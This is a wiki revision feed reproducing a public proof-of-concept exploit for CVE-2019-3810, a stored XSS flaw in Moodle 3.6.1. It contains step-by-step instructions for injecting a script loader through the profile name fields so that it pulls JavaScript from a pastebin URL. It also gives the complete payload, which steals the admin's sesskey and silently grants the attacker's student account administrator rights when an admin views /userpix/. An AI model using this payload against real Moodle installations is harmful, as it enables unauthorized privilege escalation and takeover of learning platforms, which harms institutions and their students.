https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-3810_Moodle_3.6.1_XSS%E6%BC%8F%E6%B4%9ECVE-2019-3810 Moodle 3.6.1 XSS漏洞 - Revision history2026-04-14T10:43:35ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2019-3810_Moodle_3.6.1_XSS%E6%BC%8F%E6%B4%9E&diff=1956&oldid=prevPwnwiki: Created page with "==XSS== <pre> # Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) # Date: 04/2021 # Exploit Author: farisv # Vendor Homepage: https://moodle.org/ # Software..."2021-04-30T10:14:21Z<p>Created page with "==XSS== <pre> # Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) # Date: 04/2021 # Exploit Author: farisv # Vendor Homepage: https://moodle.org/ # Software..."</p>
<p><b>New page</b></p><div>==XSS==<br />
<pre><br />
# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)<br />
# Date: 04/2021<br />
# Exploit Author: farisv<br />
# Vendor Homepage: https://moodle.org/<br />
# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip<br />
# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16<br />
# CVE: CVE-2019-3810<br />
<br />
Moodle is a learning platform designed to provide educators, administrators,<br />
and learners with a single robust, secure and integrated system to create<br />
personalised learning environments.<br />
<br />
The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for<br />
privilege escalation from student to administrator.<br />
<br />
1. Upload the XSS payload [1] to pastebin or other similar service.<br />
Change the value of userid to your own id.<br />
Let's say the URL is https://pastebin.com/raw/xxxxxxxx.<br />
2. Login to your student account.<br />
3. Set first name with:<br />
" style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement<br />
4. Set surname with:<br />
('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')<br />
5. Ask the administrator to open /userpix/ page or put the link to that page<br />
on your post and wait.<br />
<br />
If successful, your account will be added as administrator.<br />
<br />
See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810<br />
<br />
[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id.<br />
<br />
var webroot = '/';<br />
var userid = '3';<br />
var sesskey = '';<br />
<br />
function get(path, success) {<br />
var xhr = new XMLHttpRequest();<br />
xhr.open('GET', webroot + path);<br />
xhr.onreadystatechange = function() {<br />
if (xhr.readyState > 3 && xhr.status == 200) {<br />
success(xhr.responseText);<br />
}<br />
};<br />
xhr.send();<br />
return xhr;<br />
}<br />
<br />
function post(path, data, success) {<br />
var xhr = new XMLHttpRequest();<br />
xhr.open('POST', webroot + path);<br />
xhr.onreadystatechange = function() {<br />
if (xhr.readyState > 3 && xhr.status == 200) {<br />
success(xhr.responseText);<br />
}<br />
};<br />
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');<br />
xhr.send(encodeURI(data));<br />
return xhr;<br />
}<br />
<br />
function setAdmin() {<br />
// Assign administrator access to userid<br />
bpath = 'admin/roles/admins.php';<br />
data = "confirmadd=" + userid + "&sesskey=" + sesskey;<br />
post(bpath, data, function(data){});<br />
}<br />
<br />
function getSesskey(data) {<br />
var sesskey_find = data.indexOf('"sesskey":"');<br />
sesskey = data.substr(sesskey_find + 11, 10);<br />
setAdmin();<br />
}<br />
<br />
function payload() {<br />
// We can find Sesskey inside JS script in main page<br />
get('', getSesskey);<br />
}<br />
<br />
// Start<br />
payload();<br />
<br />
</pre></div>Pwnwiki